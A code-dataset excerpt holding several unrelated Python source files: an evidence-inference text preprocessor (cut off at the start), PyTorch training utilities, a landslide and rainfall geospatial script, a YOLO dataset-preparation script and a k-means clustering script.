f'PMC{article_id}.abst'\n        base = base_ABS_path\n        ext = 'abst'\n    else:\n        name = f'PMC{article_id}.txt'\n        base = base_TXT_path\n        ext = 'txt'\n    text = get_text_article(article_id, base=base, ext=ext)\n    if text is None:\n        return None\n    return article_reader.TextArticle(name=name, text=text, article_id=article_id)\n\ndef get_text_article(article_id, base=base_TXT_path, ext='txt') -> str:\n    name = f'PMC{article_id}.{ext}'\n    txt_path = os.path.join(base, name)\n    if not os.path.exists(txt_path):\n        logging.warning(f'Article {article_id} not found at {txt_path}')\n        return None\n    with open(txt_path, 'r') as inf:\n        return inf.read()\n\ndef read_in_text_articles(article_ids=None, abstracts=False) -> List[str]:\n    anno_df = pd.read_csv(anno_csv_path)\n    if abstracts:\n        anno_df = anno_df[anno_df['In Abstract']]\n    unique_article_ids = anno_df[STUDY_ID_COL].unique()\n\n    articles = []\n    for article_id in unique_article_ids:\n        if article_ids is None or article_id in article_ids:\n            text_article = get_text_article_(article_id, abstract=abstracts)\n            if text_article is not None:\n                articles.append(text_article)\n            #articles.append((article_id, get_text_article(article_id)))\n\n    return articles\n\ndef extract_raw_text(article, sections_of_interest=None):\n    if sections_of_interest is None:\n        #sections_of_interest = [\"results\", \"\"]\n        sections_of_interest = article.article_dict.keys()\n\n    article_sections = [sec for sec in article.article_dict.keys() if any(\n        [s in sec for s in sections_of_interest])]\n    article_body = article.to_raw_str(fields=article_sections)\n    \n    if sections_of_interest is None \\\n        or 'TITLE' in sections_of_interest \\\n        or 'title' in sections_of_interest:\n        ti_ab = \"TITLE: \" + article.get_title() + \"\\n\\n\"\n        raw_text = ti_ab + \" \" + article_body\n    else:\n        raw_text = article_body\n    \n    return raw_text.replace(\"\", \"\")\n\n\ndef extract_text_from_prompts(prompts_df):\n    I, C, O = prompts_df['Intervention'].values, prompts_df['Comparator'].values, prompts_df['Outcome'].values\n    all_prompt_text = [s.lower() for s in np.concatenate([I, C, O])]\n    return all_prompt_text\n\n\ndef get_inference_vectorizer(article_ids=None, sections_of_interest=None, vocabulary_file=None):\n\n    # if article_ids is None, will use all articles\n    # in the CSV passed to the read_in_articles method.\n    articles = read_in_articles(article_ids=article_ids)\n    raw_texts = [extract_raw_text(article, sections_of_interest) for article in articles]\n\n    # we also use the prompts text to construct our vectorizer\n    prompts = read_prompts()\n    raw_prompt_text = \" \".join(extract_text_from_prompts(prompts))\n\n    raw_texts.append(raw_prompt_text)\n\n    # there is at least one prompt with tokens short enough that CountVectorizer's default destroys it, so we allow any single character through.\n    if vocabulary_file is not None:\n        with open(vocabulary_file, 'r') as vf:\n            vocab = [line.strip() for line in vf]\n        vectorizer = CountVectorizer(vocabulary=vocab, token_pattern=r\"\\b\\w+\\b\")\n        print(\"Loaded {} words from vocab file {}\".format(len(vocab), vocabulary_file))\n    else:\n        vectorizer = CountVectorizer(max_features=20000, token_pattern=r\"\\b\\w+\\b\")\n        vectorizer.fit(raw_texts)\n    tokenizer = vectorizer.build_tokenizer()\n\n    str_to_idx = vectorizer.vocabulary_\n    str_to_idx[SimpleInferenceVectorizer.PAD] = max(vectorizer.vocabulary_.values())\n    str_to_idx[SimpleInferenceVectorizer.UNK] = str_to_idx[SimpleInferenceVectorizer.PAD]+1\n    \n    # note that for now the vectorizer is fit using only the\n    # article texts (i.e., the vocab is based on 
words in full-texts,\n    # not in prompts necessarily).\n    return SimpleInferenceVectorizer(str_to_idx, tokenizer)\n\n\ndef read_annotations():\n    anno_df = pd.read_csv(anno_csv_path)\n    # we need to force EVIDENCE_COL_NAME to be strings in all cases; pandas occasionally reads some values as floats.\n    anno_df = anno_df[anno_df.apply(lambda row: bool(row[VALID_LABEL]) and bool(row[VALID_REASONING]) and len(str(row[EVIDENCE_COL_NAME])) > 0 and row[LABEL] != 'invalid prompt', axis=1)]\n    #annos[~annos[\"Answer_Val\"].isin([-1, 0, 1])]\n    # TODO revisit this; right now just overwriting for convenience\n    # anno_df[\"Answer_Val\"].replace({3:0}, inplace=True)\n    return anno_df\n\n\ndef read_prompts():\n    prompts_df = pd.read_csv(prompts_csv_path)\n    prompts_df = prompts_df[prompts_df.apply(lambda row: all(map(lambda x: type(x) == str and x is not None and bool(x.strip()), [row['Comparator'], row['Intervention'], row['Outcome']])), axis=1)]\n    return prompts_df\n\ndef assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=False, annotations=None, sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False):\n    Xy = []\n    for prompt_id in training_prompts[PROMPT_ID_COL_NAME].values:\n        if lbls_too:\n            Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id,\n                                                     include_lbls=True, annotations_df=annotations, sections_of_interest=sections_of_interest,\n                                                     include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n        else:\n            Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, sections_of_interest=sections_of_interest,\n                                                     include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n        Xy.append(Xy_dict)\n    return Xy\n\n\ndef _read_ids(f):\n    with open(f, 'r') as tf:\n        ids = list(int(x.strip()) for x in tf.readlines())\n    ids_dict = OrderedDict()\n    for x in ids:\n        ids_dict[x] = x\n    return set(ids_dict.keys())\n\ndef train_document_ids():\n    \"\"\" Returns the set of document ids for a fixed training set \"\"\"\n    return _read_ids(_train_id_file)\n\ndef validation_document_ids():\n    \"\"\" Returns the set of document ids for a fixed validation set \"\"\"\n    return _read_ids(_validation_id_file)\n\ndef test_document_ids():\n    \"\"\" Returns the set of documents for a fixed test set \"\"\"\n    return _read_ids(_test_id_file)\n\ndef get_train_Xy(train_doc_ids, sections_of_interest=None, vocabulary_file=None, include_sentence_span_splits=False, include_raw_texts=False):\n    \"\"\" Loads the relevant documents, builds a vectorizer, and returns a list of training instances\"\"\"\n    prompts = read_prompts()\n    annotations = read_annotations()\n\n    # filter out prompts for which we do not have annotations for whatever reason\n    # this was actually just one case; not sure what was going on there.\n    def have_annotations_for_prompt(prompt_id):\n        return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n    prompts = [prompt for row_idx, prompt in prompts.iterrows() if\n               have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n    prompts = pd.DataFrame(prompts)\n\n    inference_vectorizer = get_inference_vectorizer(article_ids=train_doc_ids, sections_of_interest=sections_of_interest, vocabulary_file=vocabulary_file)\n\n    training_prompts = prompts[prompts[STUDY_ID_COL].isin(train_doc_ids)]\n\n    training_prompts = pd.DataFrame(training_prompts)\n    train_Xy = assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=True, annotations=annotations, 
include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n\n    return train_Xy, inference_vectorizer\n\n\ndef get_Xy(docids, inference_vectorizer: 'SimpleInferenceVectorizer', sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False):\n    prompts = read_prompts()\n    annotations = read_annotations()\n\n    # filter out prompts for which we do not have annotations for whatever reason\n    # this was actually just one case; not sure what was going on there.\n    def have_annotations_for_prompt(prompt_id):\n        return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n    prompts = [prompt for row_idx, prompt in prompts.iterrows() if\n               have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n    prompts = pd.DataFrame(prompts)\n\n    prompts = prompts[prompts[STUDY_ID_COL].isin(docids)]\n    Xy = assemble_Xy_for_prompts(prompts, inference_vectorizer, lbls_too=True, annotations=annotations, sections_of_interest=sections_of_interest, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n    return Xy\n\n\nclass SimpleInferenceVectorizer:\n    UNK = \"\"\n    PAD = \"\"\n\n    def __init__(self, str_to_idx, tokenizer):\n        self.str_to_idx = str_to_idx\n        self.idx_to_str = [None]*(len(self.str_to_idx))\n        self.sentence_splits = {} # map of article ids to array of sentence splits\n        self.token_evidence = {}\n\n        for w, idx in self.str_to_idx.items():\n            # indices are within range by construction (see get_inference_vectorizer)\n            self.idx_to_str[idx] = w\n\n        self.tokenizer = tokenizer\n\n    def string_to_seq(self, s):\n        tokenized = self.tokenizer(s)\n        unk_idx = self.str_to_idx[SimpleInferenceVectorizer.UNK]\n        vectorized = [self.str_to_idx.get(token, unk_idx) for token in tokenized]\n        return np.array(vectorized)\n\n    def vectorize(self, prompts_df, prompt_id, include_lbls=False, annotations_df=None, sections_of_interest=None,\n                  include_sentence_span_splits=False, include_raw_text=False):\n        \"\"\"\n        Vectorize the prompt specified by the ID.\n        \"\"\"\n        if include_lbls and annotations_df is None:\n            raise ValueError(\"When including annotations, they must already be defined\")\n\n        prompt = prompts_df[prompts_df[PROMPT_ID_COL_NAME]==prompt_id]\n\n        ###\n        # vectorize the article itself.\n        article_id = str(prompt[STUDY_ID_COL].values[0])\n        article = get_article(article_id)\n        article_text = extract_raw_text(article, sections_of_interest)\n        article_text = article_text.lower()\n        vectorized_article = self.string_to_seq(article_text)\n\n        ###\n        # and now vectorize the prompt (I/C/O)\n        I_v = self.string_to_seq(prompt[\"Intervention\"].values[0].lower())\n        C_v = self.string_to_seq(prompt[\"Comparator\"].values[0].lower())\n        O_v = self.string_to_seq(prompt[\"Outcome\"].values[0].lower())\n\n        return_dict = {\"article\":vectorized_article, \"I\":I_v, \"C\":C_v, \"O\":O_v, \"a_id\": article_id, \"p_id\": prompt_id}\n\n        if include_lbls:\n            # then also read out the labels.\n            assert (annotations_df is not None)\n            annotations_for_prompt = annotations_df[annotations_df[PROMPT_ID_COL_NAME] == prompt_id]\n            labels = annotations_for_prompt[[LBL_COL_NAME,EVIDENCE_COL_NAME]].values\n            return_dict[\"y\"] = labels\n            # remove html tags\n            for l in labels:\n                parser.feed(str(l[1]))\n                l[1] = parser.get_data()\n\n            spans = annotations_for_prompt[[EVIDENCE_START,EVIDENCE_END]].values\n            if len(spans) > 0 and sections_of_interest is None:\n                # split into sentences, find which are evidence, and also encode all.\n                sentence_spans = []\n                if include_raw_text or include_sentence_span_splits:\n                
sen = split_into_sentences(article_id, article_text, self.sentence_splits)\n if include_raw_text:\n return_dict[\"all_article_sentences\"] = sen \n\n if include_sentence_span_splits:\n tmp = find_span_location(sen, [s[0] for s in spans], [e[1] for e in spans])\n for t in tmp:\n sentence_spans.append([self.string_to_seq(t[0]), t[1]])\n \n # encode the evidence spans \n evidence_spans = set()\n for start, end in spans:\n article_before_span = article_text[:int(start)]\n # +1 because the slice gets every character (and therefore token) *before* the evidence, so we want to offset the token count by 1 to actually start in the evidence\n span_start_idx = len(self.tokenizer(article_before_span)) + 1\n article_at_end_of_span = article_text[:int(end)]\n span_end_idx = len(self.tokenizer(article_at_end_of_span))\n evidence_spans.add((span_start_idx, span_end_idx))\n \n return_dict['sentence_span'] = sentence_spans \n return_dict['evidence_spans'] = evidence_spans\n if include_sentence_span_splits:\n return_dict['token_ev_labels'] = gen_exact_evid_array(sentence_spans, evidence_spans, return_dict, self.idx_to_str)\n \n return return_dict\n\n def decode(self, v):\n return [self.idx_to_str[idx] for idx in v]\n","repo_name":"jayded/evidence-inference","sub_path":"evidence_inference/preprocess/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":16616,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"32"}
+{"seq_id":"102199253","text":"import atexit\nimport functools\nimport logging\nimport os\nimport random\nimport sys\nfrom collections import defaultdict\nfrom dataclasses import fields, is_dataclass\nfrom typing import Any, Mapping, Protocol, runtime_checkable\n\nimport hydra\n\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nfrom iopath.common.file_io import g_pathmgr\nfrom omegaconf import OmegaConf\n\n\ndef register_omegaconf_resolvers():\n OmegaConf.register_new_resolver(\"get_method\", hydra.utils.get_method)\n OmegaConf.register_new_resolver(\"get_class\", hydra.utils.get_class)\n OmegaConf.register_new_resolver(\"times\", lambda x, y: x * y)\n OmegaConf.register_new_resolver(\"divide\", lambda x, y: x / y)\n OmegaConf.register_new_resolver(\"range\", lambda x: list(range(x)))\n OmegaConf.register_new_resolver(\"int\", lambda x: int(x))\n\n\ndef setup_distributed_backend(backend):\n \"\"\"\n Initialize torch.distributed and set the CUDA device.\n Expects environment variables to be set as per\n https://pytorch.org/docs/stable/distributed.html#environment-variable-initialization\n along with the environ variable \"LOCAL_RANK\" which is used to set the CUDA device.\n This is run inside a new process, so the cfg is reset and must be set explicitly.\n \"\"\"\n local_rank = int(os.environ[\"LOCAL_RANK\"])\n torch.distributed.init_process_group(backend=backend)\n\n\ndef get_machine_local_and_dist_rank():\n \"\"\"\n Get the distributed and local rank of the current gpu.\n \"\"\"\n local_rank = int(os.environ.get(\"LOCAL_RANK\", None))\n distributed_rank = int(os.environ.get(\"RANK\", None))\n assert (\n local_rank is not None and distributed_rank is not None\n ), \"Please the set the RANK and LOCAL_RANK environment variables.\"\n return local_rank, distributed_rank\n\n\ndef print_cfg(cfg):\n \"\"\"\n Supports printing both Hydra DictConfig and also the AttrDict config\n \"\"\"\n logging.info(\"Training with config:\")\n logging.info(OmegaConf.to_yaml(cfg))\n\n\ndef set_seeds(seed_value, max_epochs, dist_rank):\n \"\"\"\n Set the python random, numpy and torch seed for each gpu. Also set the CUDA\n seeds if the CUDA is available. 
This ensures deterministic nature of the training.\n \"\"\"\n # Since in the pytorch sampler, we increment the seed by 1 for every epoch.\n seed_value = (seed_value + dist_rank) * max_epochs\n logging.info(f\"MACHINE SEED: {seed_value}\")\n random.seed(seed_value)\n np.random.seed(seed_value)\n torch.manual_seed(seed_value)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed_value)\n\n\ndef makedir(dir_path):\n \"\"\"\n Create the directory if it does not exist.\n \"\"\"\n is_success = False\n try:\n if not g_pathmgr.exists(dir_path):\n g_pathmgr.mkdirs(dir_path)\n is_success = True\n except BaseException:\n logging.info(f\"Error creating directory: {dir_path}\")\n return is_success\n\n\ndef is_dist_avail_and_initialized():\n if not dist.is_available():\n return False\n if not dist.is_initialized():\n return False\n return True\n\n\ndef get_amp_type(amp_type: str):\n\n assert amp_type in [\"bfloat16\", \"float16\"], \"Invalid Amp type.\"\n\n if amp_type == \"bfloat16\":\n return torch.bfloat16\n else:\n return torch.float16\n\n\n@runtime_checkable\nclass _CopyableData(Protocol):\n def to(self, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Copy data to the specified device\"\"\"\n ...\n\n\ndef _is_named_tuple(x) -> bool:\n return isinstance(x, tuple) and hasattr(x, \"_asdict\") and hasattr(x, \"_fields\")\n\n\ndef copy_data_to_device(data, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Function that recursively copies data to a torch.device.\n\n Args:\n data: The data to copy to device\n device: The device to which the data should be copied\n args: positional arguments that will be passed to the `to` call\n kwargs: keyword arguments that will be passed to the `to` call\n\n Returns:\n The data on the correct device\n \"\"\"\n\n if _is_named_tuple(data):\n return type(data)(\n **copy_data_to_device(data._asdict(), device, *args, **kwargs)\n )\n elif isinstance(data, (list, tuple)):\n return type(data)(copy_data_to_device(e, device, *args, **kwargs) for e in data)\n elif isinstance(data, defaultdict):\n return type(data)(\n data.default_factory,\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n },\n )\n elif isinstance(data, Mapping):\n return type(data)(\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n }\n )\n elif is_dataclass(data) and not isinstance(data, type):\n new_data_class = type(data)(\n **{\n field.name: copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n )\n for field in fields(data)\n if field.init\n }\n )\n for field in fields(data):\n if not field.init:\n setattr(\n new_data_class,\n field.name,\n copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n ),\n )\n return new_data_class\n elif isinstance(data, _CopyableData):\n return data.to(device, *args, **kwargs)\n return data\n\n\ndef move_optimizer_state_to_device(\n optimizer: torch.optim.Optimizer, device: torch.device\n) -> torch.optim.Optimizer:\n optimizer.state = copy_data_to_device(optimizer.state, device)\n return optimizer\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, device, fmt=\":f\"):\n self.name = name\n self.fmt = fmt\n self.device = device\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self._allow_updates = True\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / 
self.count\n\n def synchronize(self):\n assert self._allow_updates, \"Please reset the meter to allow synchronization.\"\n if not is_dist_avail_and_initialized():\n return\n t = torch.tensor(\n [self.sum, self.count], dtype=torch.float64, device=self.device\n )\n dist.barrier()\n dist.all_reduce(t)\n t = t.tolist()\n self.sum = int(t[0])\n self.count = t[1]\n self.avg = self.sum / self.count if self.count > 0 else np.nan\n self._allow_updates = False\n\n def __str__(self):\n fmtstr = \"{name} {val\" + self.fmt + \"} ({avg\" + self.fmt + \"})\"\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n logging.info(\"\\t\".join(entries))\n\n def synchronize(self):\n for meter in self.meters:\n meter.synchronize()\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = \"{:\" + str(num_digits) + \"d}\"\n return \"[\" + fmt + \"/\" + fmt.format(num_batches) + \"]\"\n\n\ndef get_resume_checkpoint(checkpoint_save_dir):\n\n if not g_pathmgr.isdir(checkpoint_save_dir):\n return None\n ckpt_file = os.path.join(checkpoint_save_dir, \"checkpoint.pt\")\n if not g_pathmgr.isfile(ckpt_file):\n return None\n\n return ckpt_file\n\n\n# TODO: Move this to a separate logging file.\n\n\ndef setup_logging(name, output_dir=None, rank=0):\n \"\"\"\n Setup various logging streams: stdout and file handlers.\n For file handlers, we only setup for the master gpu.\n \"\"\"\n # get the filename if we want to log to the file as well\n log_filename = None\n if output_dir:\n makedir(output_dir)\n if rank == 0:\n log_filename = f\"{output_dir}/log.txt\"\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # create formatter\n FORMAT = \"%(levelname)s %(asctime)s %(filename)s:%(lineno)4d: %(message)s\"\n formatter = logging.Formatter(FORMAT)\n\n # clean up any pre-existing handlers\n for h in logger.handlers:\n logger.removeHandler(h)\n logger.root.handlers = []\n\n # setup the console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n # we log to file as well if user wants\n if log_filename and rank == 0:\n file_handler = logging.StreamHandler(_cached_log_stream(log_filename))\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n logging.root = logger\n\n\n# cache the opened file object, so that different calls to `setup_logger`\n# with the same file name can safely write to the same file.\n@functools.lru_cache(maxsize=None)\ndef _cached_log_stream(filename):\n # we tune the buffering value so that the logs are updated\n # frequently.\n log_buffer_kb = 10 * 1024 # 10KB\n io = g_pathmgr.open(filename, mode=\"a\", buffering=log_buffer_kb)\n atexit.register(io.close)\n return io\n\n\ndef shutdown_logging():\n \"\"\"\n After training is done, we ensure to shut down all the logger streams.\n \"\"\"\n logging.info(\"Shutting down loggers...\")\n handlers = logging.root.handlers\n for handler in handlers:\n 
handler.close()\n","repo_name":"facebookresearch/omnivore","sub_path":"omnivision/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":525,"dataset":"github-code","pt":"32"}
+{"seq_id":"24588082881","text":"import os\nimport rasterio\nimport pandas as pd\nimport geopandas as gp\nfrom matplotlib import pyplot as plt\nfrom functools import reduce\nfrom geopandas import GeoDataFrame\nfrom shapely.geometry import Polygon, Point\nfrom rasterio.features import shapes\n\nclass Slidding:\n\n\texport_rain = pd.DataFrame()\n\tdeslizamientos = pd.DataFrame()\t\n\tmunicipios = pd.DataFrame()\n\tfolder = '../Datos/CHIRPS/'\n\trasters = []\n\n\tdef __init__(self, folder = '../Datos/CHIRPS/') -> None:\n\t\tself.folder = folder\n\n\tdef get_date(self, tiff_path):\n\t\ttiff_name = tiff_path.split('/')[-1]\n\t\tdate = '-'.join(tiff_name.split('.')[:-1])\n\t\treturn date\n\n\tdef open_tiff(self, src, date, mask = None):\n\t\tresults = []\n\t\tfor s, v in shapes(src.read(), mask=mask, transform=src.meta['transform']):\n\t\t\tdata = {\n\t\t\t\t'properties': {date: v}, \n\t\t\t\t'geometry': Polygon(s['coordinates'][0]).centroid\n\t\t\t}\n\t\t\tresults.append(data)\n\t\treturn results\n\n\tdef get_raster(self, path):\n\t\tsrc = rasterio.open(path)\n\t\tcrs = src.read_crs()\n\t\tdate = self.get_date(path)\n\t\ttiff = self.open_tiff(src, date)\n\t\tsrc.close()\n\t\traster = GeoDataFrame.from_features(tiff, crs=crs)\n\t\traster['geometry'] = raster['geometry'].to_crs(crs)\n\t\treturn raster\n\n\tdef get_rasters(self):\n\t\tfor file in os.listdir(self.folder):\n\t\t\tif file.endswith('.tif'):\n\t\t\t\tpath = os.path.join(self.folder, file)\n\t\t\t\traster = self.get_raster(path)\n\t\t\t\tself.rasters.append(raster)\n\t\treturn self.rasters\n\n\tdef get_municipios(self):\n\t\tself.municipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tself.municipios = self.municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\treturn self.municipios\n\n\tdef run(self):\n\t\tself.get_rasters()\n\t\tself.get_municipios()\n\t\t\n\t\tself.deslizamientos = gp.read_file('procesamiento/INVENTARIO_FINAL_MM.csv')\n\t\tself.deslizamientos.columns = ['movimiento', 'fecha', 'municipio', 'latitud', 'longitud', 'fuente', 'geometry']\n\t\tself.deslizamientos.geometry = self.deslizamientos.apply(lambda row: Point(float(row['longitud']), float(row['latitud'])), axis=1)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[['geometry', 'movimiento', 'fecha', 'fuente']]\n\t\tself.deslizamientos.fecha = pd.to_datetime(self.deslizamientos.fecha, format='%d/%m/%Y')\n\t\tself.deslizamientos.set_crs(epsg=4326, inplace=True)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[self.deslizamientos.fecha >= '2010-01-01']\n\t\t# print(deslizamientos.shape)\n\t\t# deslizamientos.head()\n\n\t\treturn self.deslizamientos\n\n\tdef export_to_geoJson(self):\n\t\t\n\t\tmunicipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tmunicipios = municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\tprint(municipios.shape)\n\t\tmunicipios.head()\n\n\t\t# Obtener los municipios que contienen deslizamientos\n\t\tgeodata = gp.sjoin(self.deslizamientos, municipios, how='left', predicate='intersects')\n\t\tgeodata = geodata[geodata['index_right'].notna()]\n\t\tgeodata = geodata.drop(columns=['index_right'])\n\t\t# print(geodata.shape)\n\t\t# Exportar a GeoJSON\n\t\tgeodata.to_file('deslizamientos.geojson', driver='GeoJSON')\n\t\t# 
geodata.head()","repo_name":"karinstefa/VA_project","sub_path":"Slidding.py","file_name":"Slidding.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38387809784","text":"\n\"\"\"\nNoting down steps followed:\n\n1. The ultralytics weights file - made a copy in drive and moved it to the required folder in drive itself\n2. Locally create the folder structure as mentioned here https://github.com/theschoolofai/YoloV3\n3. Created custom.data and custom.names locally inside customdata folder\n4. Changed Images/ to \"data/customdata/images\" in train.txt\n5. Changed .txt to .jpg in train.txt\n6. In train.txt, file named \"Aimgg_005.jpg\" is a typo - so rename it to Aimg_005.jpg\n7. In test.txt, file names ImageYolo.jpg does not exists, so remove it\n8. In test.txt, file names M/img_010 does not exists - so rename it to Mimg_010\n\n\"\"\"\n\nimport os\nimport shutil\nimport zipfile as zp\n\nfrom PIL import Image\n\n\n\n\nZOHEB_ZIPFILE_PATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/YoloV3_Dataset.zip\"\nCUSTOMDATA_FOLDERPATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/images_structured/customdata\"\n\nARRANGED_IMGFOLDER = CUSTOMDATA_FOLDERPATH + \"/images\"\nARRANGED_LBLFOLDER = CUSTOMDATA_FOLDERPATH + \"/labels\"\n\n\n# Code for checking if any value in label texts is above 1.000\n\n\n\n\n# Code for checking if file exists:\n\n\nwith open(\"./data/customdata/train.txt\",\"r\") as infl:\n for k in infl:\n k = k.strip()\n if not os.path.exists( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") ):\n print( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") )\n\n\n\n\ndef make_filepath_list(imgfolder, lblfolder):\n image_files = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n label_files = [ os.path.splitext(l)[0] for l in os.listdir(lblfolder) ]\n\n image_names = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n\n \n\n\n\ndef rearrange_images_labels_and_zip(zipfile_path, customdata_folderpath):\n\n extract_path, extract_folder = os.path.split(zipfile_path)\n extract_folder = extract_folder.replace(\".zip\",\"\")\n\n # Extract contents from zip\n with zp.ZipFile(zipfile_path, \"r\") as zip:\n zip.extractall()\n\n # Define relevant file paths\n imgfolder = extract_folder + \"/Images\"\n lblfolder = extract_folder + \"/Labels\"\n train_file_list = extract_folder + \"/train.txt\"\n test_file_list = extract_folder + \"/test.txt\"\n name_list = extract_folder + \"/classes.txt\"\n\n dest_imgfolder = ARRANGED_IMGFOLDER\n dest_lblfolder = customdata_folderpath + \"/labels\"\n dest_train_file_list = customdata_folderpath + \"/train.txt\"\n dest_test_file_list = customdata_folderpath + \"/test.txt\"\n dest_name_list = customdata_folderpath + \"/custom.names\"\n \n\n shutil.copytree(imgfolder, dest_imgfolder, dirs_exist_ok=True)\n shutil.copytree(lblfolder, dest_lblfolder, dirs_exist_ok=True)\n shutil.copy(train_file_list, dest_train_file_list)\n shutil.copy(test_file_list, dest_test_file_list)\n shutil.copy(name_list, dest_name_list)\n\n\n\ndef rename_image_exts(arranged_imgfolder):\n\n image_filenames = os.listdir(arranged_imgfolder)\n\n for fl in image_filenames:\n fil, ex = os.path.splitext(fl)\n if ex != \".jpg\":\n print(fl)\n\n if ex == \".png\":\n png_to_jpg(image_filepath=os.path.join(arranged_imgfolder, fl))\n else:\n os.rename( os.path.join(arranged_imgfolder, fl), \n os.path.join(arranged_imgfolder, fil+\".jpg\") )\n\n\n\ndef png_to_jpg(image_filepath):\n im = 
Image.open(image_filepath)\n rgb_im = im.convert(\"RGB\")\n rgb_im.save(image_filepath.replace(\".png\",\".jpg\"))\n os.remove(image_filepath)\n\n\ndef clip_to_ones_in_labels():\n pass\n\n\n\nif __name__ == \"__main__\":\n rearrange_images_labels_and_zip(zipfile_path=ZOHEB_ZIPFILE_PATH, \n customdata_folderpath=CUSTOMDATA_FOLDERPATH)\n# rename_image_exts(arranged_imgfolder=ARRANGED_IMGFOLDER)\n\n\n\n\n","repo_name":"sairamsubramaniam/tsai_projects","sub_path":"assignment13_yolo/yolo_ppe/cleanup_prepare.py","file_name":"cleanup_prepare.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11919794095","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n\ndef kmean_cluster(df,clusters):\n\n kmeans_df = df[['principal component 1', 'principal component 2']].copy()\n kmeans = KMeans(init=\"k-means++\", n_clusters=clusters).fit(kmeans_df)\n labels = kmeans.labels_\n X_dist = (kmeans.transform(kmeans_df))\n\n distance = []\n\n for inner_list in X_dist:\n distance.append((min(inner_list)))\n\n kmeans_df['PRED'] = labels\n kmeans_df['test_name'] = df['test_name'].values\n kmeans_df['distance'] = distance\n\n grouped_df = kmeans_df.groupby(\"PRED\")\n grouped_lists = grouped_df[\"test_name\"].apply(list)\n grouped_lists = grouped_lists.reset_index()\n df_result = grouped_lists.explode('test_name')\n grouped_lists.explode('test_name').to_csv(\"clusters.csv\")\n\n return df_result,kmeans\n\ndef plot_kmeans(df, kmeans):\n\n centroids = kmeans.cluster_centers_\n plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)\n plt.scatter(df['principal component 1'], df['principal component 2'], c= kmeans.labels_.astype(float), s=50, alpha=0.5)\n for i, label in enumerate(df['test_name']):\n plt.annotate(i, (df['principal component 1'][i], df['principal component 2'][i]))\n plt.xlabel(\"Component 1\")\n plt.ylabel(\"Component 2\")\n plt.grid()\n plt.show()\n\n\ndef main():\n\n FILE = \"pca.csv\"\n clusters = 2\n\n if len(sys.argv) > 1:\n FILE = sys.argv[1]\n clusters = int(sys.argv[2])\n\n df = pd.read_csv(FILE)\n df_result = kmean_cluster(df,clusters)\n print(df_result)\n\nif __name__ == \"__main__\":\n 